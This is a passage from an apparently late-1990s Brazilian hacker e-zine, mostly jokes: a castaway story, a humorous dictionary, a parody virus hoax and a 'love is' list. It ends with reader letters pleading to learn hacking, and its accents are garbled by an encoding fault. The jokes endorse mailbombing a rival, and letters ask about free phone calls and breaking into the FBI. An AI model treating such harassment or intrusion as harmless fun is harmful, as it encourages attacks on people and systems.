sistemas aceitou, meio sem jeito. A moτa remou com extrema >> destreza ao redor da ilha. Quando chegou no "seu" lado, amarrou a canoa >com >> uma corda que mais parecia uma obra prima de artesanato. Os dois >caminharam por uma passarela de pedras construφda pela moτa e depararam, >atrßs de um coqueiro, com um lindo chalΘ pintado de azul e branco. >> * Nπo Θ muito, disse ela, mas eu o chamo de "lar". >> Jß dentro, ela convidou: >> * Sente-se, por favor! Aceita um drinque? >> * Nπo, obrigado! Nπo aguento mais ßgua de coco! >> * Mas nπo Θ ßgua de coco! Eu tenho um alambique meio rudimentar lß fora, >de >> forma que podemos tomar Pinas-coladas autΩnticas! >> Tentando esconder a surpresa, o analista aceitou. Sentaram no sofß dela >> para conversar. Depois de contarem suas hist≤rias, a moτa perguntou: >> * VocΩ sempre teve barba? >> * Nπo. Toda a vida eu andei bem barbeado. >> * Bom, se quer se barbear, tem uma navalha lß em cima, no armarinho do >> banheiro. >> O homem achou que a moτa estava de sacanagem, mas foi assim mesmo. Lß em >cima, surpreso, fez a barba com um complicado aparelho feito de osso e >> conchas, tπo afiado quanto uma navalha. >> A seguir, tomou um bom banho, sem nem querer arriscar palpites sobre como >> ela tinha ßgua quente no banheiro. Desceu sem poder deixar de se >maravilhar >> com o acabamento do corrimπo. >> * VocΩ ficou ≤timo! Vou lß em cima tambΘm me trocar por algo mais >> confortßvel. >> Nosso her≤i continuou bebericando sua pina colada. Em instantes, a moτa >> estava de volta, com um delicioso perfume de gardΩnias, e vestindo um >> estonteante e revelador robe, muito bem trabalhado em folhas de palmeira. >> * Bom - disse ela - ambos temos passado um longo tempo sem qualquer >> companhia... VocΩ nπo tem se sentido solitßrio? Ha alguma coisa de que >vocΩ >> sente muita saudade? Que lhe faz muita falta e do qual todos os homens e> >> mulheres precisam? >> * Mas Θ claro! - disse ele esquecendo um pouco sua timidez. Tem algo que >> venho querendo todo esse tempo. Mas... aqui nesta ilha... sabe como Θ... >> era simplesmente impossφvel. >> * Bom - disse ela - jß nπo Θ mais impossφvel, se Θ que vocΩ me entende... >> O rapaz, tomado de uma excitaτπo incontrolßvel, disse, quase sem alento: >> * Nπo acredito! VocΩ nπo estß querendo dizer que... vocΩ bolou um jeito de >> pegar os seus e-mails aqui, na ilha? >> ------------------------------------------ VOC╩ ╔ UM CONSULTOR OU UMA PROSTITUTA? 1. VocΩ trabalha em horßrios malucos 2. VocΩ recebe uma nota preta para deixar o cliente feliz 3. VocΩ recebe uma boa grana mas Θ o cafetπo que fica com a maior parte 4. VocΩ passa a maior parte de seu tempo de trabalho num quarto de hotel 5. VocΩ cobra por hora mas pode extender o tempo 6. VocΩ nπo se orgulha do que faz 7. VocΩ Θ pago para criar fantasias em seus clientes 8. ╔ difφcil ter uma famφlia 9. VocΩ nπo tem satisfaτπo no seu trabalho 10. Se um cliente nπo gostou de vocΩ, o cafetπo te manda para outro cliente 11. VocΩ fica constrangido em contar αs pessoas o que vocΩ faz para viver 12. Seu cliente paga pelo seu trabalho mais a despesa do hotel 13. Seu cliente sempre quer saber quanto vocΩ cobra e o que ele vai ter direito 14. O cafetπo dirige carros de luxo como Mercedes ou BMW 15. VocΩ sabe que o cafetπo cobra mais do que vocΩ vale mas se o cliente Θ burro nπo Θ problema seu 16. Quando vocΩ vai no cliente, vocΩ tem uma cara ≤tima, mas quando sai estß um horror (comparando com sua cara na segunda de manhπ com a de sexta α tarde) 17. VocΩ Θ avaliado pela sua "performance" num trabalho vergonhoso 18. Embora vocΩ ganhe uma boa grana, seu cliente Θ que sai com a cara feliz 19. O cliente sempre acha que estß pagando mais do que deveria, e, por outro lado, espera que voΩ faτa milagres 20. Quando vocΩ recebe o seu percentual sempre imagina se com outro cafetπo nπo receberia mais. ------------------------------------------- Taglines Quem Θ da ßrea da computaτπo nπo tem defeitos, tem BUG`s; nπo tem mem≤ria fraca, tem pouca mem≤ria RAM; nπo acorda de manhπ,dß um boot nas idΘias; nπo namora, faz um download em alguΘm; Nπo transa, se conecta a alguΘm; nπo brocha, tem uma queda de conecτπo, e por ·ltimo nπo caga, passa um e-mail Obs: Tem uma Silvia R.G. que realmente arruma piadas.. > Dicionßrio > > > "O asterisco nada mais Θ do que um ponto final > Hippie." > > "O que Θ um intelectual? Apenas um homem que > descobriu alguma coisa mais interessante do que as > mulheres." > > "Loteria: acho que, jogando ou nπo, vocΩ tem a mesma > chance de ganhar." > > "Um expert Θ um homem que parou de pensar. Para que > pensar, se ele Θ um expert?" > > "A arte da Medicina consiste em distrair enquanto a > Natureza cuida da doenτa." > > "Plano Real Θ uma idΘia na cabeτa e uma cΓmara de > Deputados na mπo." > > "Um rep≤rter de rock Θ um jornalista que nπo sabe > escrever, entrevistando gente que nπo sabe falar, > para pessoas que nπo sabem ler." > > "Os conservadores sπo pessimistas quanto ao futuro e > otimistas quanto ao passado." > > "Uma celebridade Θ uma pessoa que trabalha duro a > vida inteira para se tornar conhecida, e depois > passa a usar ≤culos escuros para nπo ser conhecida." > > "A morte de uma pessoa Θ uma tragΘdia; a de milh⌡es, > uma estatφstica." > > "Escrever Θ transformar os seus piores momentos em > dinheiro." > > "Morte Θ a vida respondendo α pergunta: 'Por quΩ?'." > > "Lixo: coisas que jogamos fora. Coisas: lixo que > guardamos." > > "Advogado: Forma larval de um polφtico." > > "Bibliotecas: Nπo hß respostas, apenas referΩncias > cruzadas." > > "Matemßtica Θ a linguagem que Deus usou para > escrever o Universo." > > "O homem contemporΓneo Θ o elo perdido entre macacos > e seres humanos." > > "Multitarefa: Ler no banheiro." > > "Filosofia: Respostas obscuras para quest⌡es > insol·veis." > > "Canela: Dispositivo para achar m≤veis no escuro." > > "O mais nobre de todos os cachorros Θ o > cachorro-quente: ele alimenta a mπo que o morde." > > "Gato: um aut⌠mato flexφvel e indestrutφvel, > fornecido pela natureza para ser chutado quando as > coisas vπo mal no cφrculo domΘstico." > > "Chato: Uma pessoa que fala quando deveria estar > ouvindo." > > "L≤gica: mΘtodo sistemßtico de chegar a conclusπo > errada com confianτa." > > ------------------------------ Atencao: ha um novo virus solto por aih. Eh pior que tudo que jah viu. Ele trabalha alterando a posicao dos pinos das portas seriais e revertendo o sentido da rotacao do disco rigido. Mais de 300.000 sistemas jah foram infectados em Murphy, West Dakota. E isso em apenas doze meses. Veja como prevenir o avanco do mal: 1-Nao ligue o computador na tomada! 2-Nao use baterias! Ha rumores de que o virus invadiu boa parte das fabricas de baterias e infectou os polos positivos delas(solucao:tente conectar apenas o polo negativo). 3-Nao faca upload ou download de programas pela Internet 4-Nao acumule arquivos nos floppy disks ou no disco rigido 5-Nao leia mensagens! Nem esta! 6-Nao use portas seriais, modens ou linhas telefonicas 7-Nao use teclados, scanners ou impressoras. 8-Nao acesse CPUs, memorias, microprocessadores ou mainframes 9-Nao use luz eletrica, aquecimento a gaz ou ar-condicionado, agua corrente, fogo, roupas ou mesmo a roda! Tenha que certeza de que, seguindo a risca esses noves passos, seu virus sera erradicado. (*inclusive voce do resto da civilizacao!).:-) ------------------------------------------------ Amar e > > Se voce ainda pensa que amar e ir ao cinema, tomar sorvete e abrir >a >porta para ela, sinceramente, voce n o sabe que ja inventaram a INTERNET?? > > Amar e > > Amar e: > enviar pra ela e-mail com background de coracaozinho. > > Amar e: > enviar mailbomb pro cara que passou cantada publica nela. > > Amar e: > enviar todos os 100 Sonetos de Amor do Neruda, um por dia, > religiosamente. > Nao obstante ainda contar como acordou, contar que escovou > os dentes, tomou cafe e tudo mais. E Ela lendo... > > Amar e: > fazer Home Page dedicada especialmente pra Ela. > > Amar e: > IMAGINAR como ela deve estar linda hoje (Tera passado a > tendinite?). > > Amar e: > enviar flores virtuais pedindo desculpas quando chegar > atrasado para o chat. > > Amar e: > ela nao engolir as desculpas, nao responder as mensagens e > ficar away no ICQ. > > Amar e: > fazer icqxo. > > Amar e: > criar juntos um Tamagouchi virtual. > > Amar e: > contar a ela tudo o que voce nao contaria ao vivo. > > Amar e: > fazer com ela tudo o que voce nao faz ao vivo. > Para sair ou pesquisar historico da lista, visite: http://listas.ansp.br ------------------------------- Cartinhas: * Por favor, eu sou LOUCA para aprender a ser um hacker, nπo para o mal, e sim para o bem, gostaria muito de ser um, mas nπo sei nem por onde comeτar, estou perdida no meio de tanta informaτπo, nπo sei do que preciso, nπo sei quais sπo os programas que sevo ter, mas quero muito ser um hacker, me ajuda? ass: * p⌠ cara,,, eu estou estudando desesperadamente,, por um lado acho que sou meio anti- social,, nπo costumo muito sair a noite ,,s≤ se for com mulher,,,,, PASSO A MAIOR PARTE do tem po no micro e estudando informaτπo,, estou louco para aprender programaτπo ,, meu!!!!!! me de uma ajuda por favor,,,,, pelo menos palavras,,, onde posso pesquisar,, nπo quero que p⌠ cara,,, eu estou estudando desesperadamente,, por um lado acho que sou meio anti- social,, nπo costumo muito sair a noite ,,s≤ se for com mulher,,,,, PASSO A MAIOR PARTE do tem po no micro e estudando informaτπo,, p⌠ pessoal; estou louco para aprender programaτπo ,, meu!!!!!! me de uma ajuda por favor,,,,, pelo menos palavras,,, onde posso pesquisar,, nπo quero que vcs percam muito seu tempo,, sei que vcs com nφveis mais elevado nπo gostam de ficar ensinando muito as pessoas a caminhar,,,, gosto muito de informßtica,, estudo na Unicamp,,, e trabalho aqui TB. ,, tenho informaτ⌡es muito importantes ; leio todas suas revistas, e estudo programaτπos por conta;estou emm busca de todo qualquer tipo de conhecimento, estou aberto para informaτ⌡es; cara!!!!! s≤ de vc me responder ficarei eternamente grato!!!!!!! muitφssimo obrigado,,,, adoro sua home page!!!!!! um abraτo ass:?????? * Sei q hacker nao se ensina a ser, e sim q ele se cria, mas mesmo assim gostaria muito de ter a disposiτπo sites e informaτ⌡es de pesquisas, q possam me ajudar no caminho para q talvez, algum dia, eu possa me tornar um HacKer ... TKS ... * Tenho 18 anos Moro em Porto Alegre-RS Adoro comput , mas nπo estou muito atualizado neste assunto ..Gostaria que vocΩ me desse algumas dicas ! Como livros , linguagens etc... Gostaria de me tornar um hacker se possφvel obrigado pela sua atenτπo !!!!Aguardo sua resposta atenciosamente !!!! * To afim de aprenter.....( pra comeτo de hist≤ria ) jß tentei de tudo para ter mais informaτ⌡es sobre o assunto, sou fanßtico por computadores, mas vc deve saber como Θ difφcil se tornar um hacker. sei que Θ chato mas gastaria que vc me auxilia-se nessa coisinha que Θ tπo simples para vc, e tπo complicado para muitos. Grato pela atenτπo. se vc puder me ajudar por favor me mande um email * Dae cara, beleza? Eu gostaria de saber como faτo ligaτ⌡es interurbanas de graτa, tanto faz se Θ de telefone p·blico (orelhπo) ou de telefone particular. Ficarei muito agradecido se vc puder me ajudar. Valeu * Gostei muito da tua Home Page e Revista. Gostaria que me desse algumas dicas e informaτ⌡es que me ajude no conhecimento do assunto. Vou logo avisando que nada disso visa o mau uso destas informaτ⌡es, uma vez que so estou interessado em saber cada vez mais e nπo utilizß-las para prejudicar ninguΘm. Afinal, tive boa eduaτπo por meus pais. :)! Um abraτπo !!!!. * Eu sei que minha atitude Θ um pouco lamer mas eu ja estou a mais de 3 anos na red e ainda nπo consegi invadir e nem criar virus eu queria saber como eu faτo para ser hacker, oque eu devo aprender em primeiro lugas oque eu devo ter conhecimento, e eu quero saber se vcs editam uma revista sem ser virtual se vcs entregam em casa exemplares. espero sua resposta e desde ja eu agradeτo * Eu faco programacao a muito tempo, ja fazia jogos e programas a tempo e so fazia programas com coneccao fia modem mas direto, sem a internet, e agora aprendi como usar o Winsock. Eu ja fiz varios programas, fiz um chat pra varias pessoas, fiz jogo da velha on line, fiz um servidor de TELNET, fiz atΘ um servidor de HTML mas nao deu muito certo, nao sei como mandar foto... mas tudo bem, e agora fiz um bom pra hackear, com uso simples de porta e IP... qual o proximo passo, eu consigo abrir ou conectar a IP que eu quizer usando a porta que eu quizer... mas e agora??? se puder me ajudar... eu realmente agracederia...e s≤ mais uma pergunta, quando eles entram no FBI por exemplo eues usam o endereco certo mas a dificuldade Θ achar a porta??? * Ae sou de uma cla mais nπo sei nada queria que vc mandase programas faceis de usar e me ensinar a ser um hacker VALEU!!!!! REsposta: Aguardem o meu livro... Bibliografia: A maior parte das notφcias veio da pßgina http://www.hackernews.com ou da lista da http://cnn.com